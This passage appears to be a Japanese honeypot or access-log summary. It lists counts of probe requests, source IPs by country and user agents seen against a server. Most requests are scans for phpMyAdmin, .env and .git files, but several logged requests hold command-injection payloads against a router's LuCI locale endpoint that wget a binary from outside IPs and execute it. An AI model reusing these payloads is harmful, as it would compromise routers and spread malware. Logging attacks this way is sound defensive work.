1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin3/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpmy-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/sqlweb/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/webdb/scripts/setup.php HTTP/1.0
1 GET http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php HTTP/1.0
5 GET http[:]//uplo[.]ad/?v=1&ip=132.145.66.34&port=80 HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /cgi-bin/nas_sharing.cgi HTTP/1.0
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 8.137.106.178 Singapore
1 18.130.132.21 United States
13 31.220.1.83 Germany
2 38.180.160.170 United States
1 38.180.160.175 United States
1 41.250.67.36 Morocco
1 45.56.108.128 United States
1 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.251 United States
3 50.114.203.186 United States
1 51.8.112.103 Germany
7 54.36.115.221 France
1 54.37.93.251 France
22 57.129.23.166 France
1 64.62.197.72 United States
1 64.62.197.73 United States
1 64.62.197.74 United States
1 72.167.44.205 United States
3 83.97.73.245 Germany
2 87.121.69.52 Bulgaria
1 91.92.241.63 Bulgaria
4 93.174.95.106 United Kingdom
1 103.153.78.154 Vietnam
12 118.123.105.85 China
2 141.98.11.79 Lithuania
4 157.230.45.135 United States
2 162.142.125.215 United States
2 167.94.145.101 United States
2 167.248.133.117 United States
2 170.64.154.131 United States
1 172.104.11.4 United States
1 172.104.11.34 United States
1 172.105.77.209 United States
1 172.105.128.11 United States
11 183.81.169.139 Mongolia
1 184.105.247.252 United States
1 185.180.143.136 Portugal
13 185.191.126.213 Seychelles
1 192.241.230.50 United States
3 195.1.144.109 Norway
2 198.235.24.196 United States
2 199.45.155.34 United States
2 205.210.31.148 United States

UserAgent一覧

件数 UserAgent
37 -
44 Go-http-client/1.1
1 Googlebot-Video/1.0
1 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.63 Chrome/124.0.6367.63 Not-A.Brand/99 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 YaBrowser/19.7.2.516 Yowser/2.5 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
35 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
4 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
2 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 0\xbe\x9d)\x89\\\xb4V\x18\x04\xb0\x02;`
1 MGLNDD_13.67.44.234_80
2 \x16\x03\x01\x01\x07\x01
1 \x16\x03\x01\x01\x9d\x01
2 \x16\x03\x01\x01\xa7\x01
1 \x16\x03\x01\x01\xb4\x01
13 \x16\x03\x01
1 \x16\x03\x02\x01\x9a\x01
1 \x16\x03\x03\x01H\x01
1 \x16\x03\x03\x01V\x01
1 \x16\x03\x03\x01\x99\x01
2 \x16\x03\x03\x01\xa5\x01
4 CONNECT google[.]com:443 HTTP/1.1
35 GET /.env HTTP/1.1
4 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /Pages/log/ HTTP/1.1
1 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /cacti HTTP/1.1
3 GET /cdn-cgi/trace HTTP/1.1
6 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193[.]233[.]203[.]237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1
2 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14[.]225[.]204[.]172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1
6 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193[.]233[.]203[.]237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1
26 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103[.]149[.]86[.]202%2Ft+-O-+|+sh%60) HTTP/1.1
1 GET /cgi-bin/main.pl HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /webui/ HTTP/1.1
1 GET /wsman HTTP/1.1
1 HEAD / HTTP/1.1
4 PRI * HTTP/2.0